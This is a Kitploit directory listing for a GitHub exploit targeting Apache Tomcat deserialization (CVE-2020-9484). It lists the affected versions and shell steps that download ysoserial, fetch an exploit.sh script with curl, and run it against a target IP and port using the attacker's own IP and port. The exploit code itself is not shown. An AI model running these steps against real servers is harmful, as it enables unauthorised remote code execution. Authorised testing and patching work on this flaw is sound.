Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2020-9484_Exploit — Exploit for Apache Tomcat deserialization (CVE-2020-9484) which could lead to RCE | Kitploit
Tools/GitHubGitHub/d3fudd/cve-2020-9484_exploit
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubd3fudd/cve-2020-9484_exploit

CVE-2020-9484_Exploit

Exploit for Apache Tomcat deserialization (CVE-2020-9484) which could lead to RCE

View Repository
1713 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2020-9484_Exploit

Exploit for Apache Tomcat deserialization (CVE-2020-9484) which could lead to RCE

Affected versions:

  • Apache Tomcat 10.x < 10.0.0-M5
  • Apache Tomcat 9.x < 9.0.35
  • Apache Tomcat 8.x < 8.5.55
  • Apache Tomcat 7.x < 7.0.104
root@kitploit:~
git clone https://github.com/frohoff/ysoserial
root@kitploit:~
cd ysoserial/
root@kitploit:~
wget https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar
root@kitploit:~
curl -s https://raw.githubusercontent.com/d3fudd/CVE-2020-9484_Exploit/main/exploit.sh > exploit.sh
root@kitploit:~
exploit.sh [your IP] [your port] [target IP] [target port]
Download Tool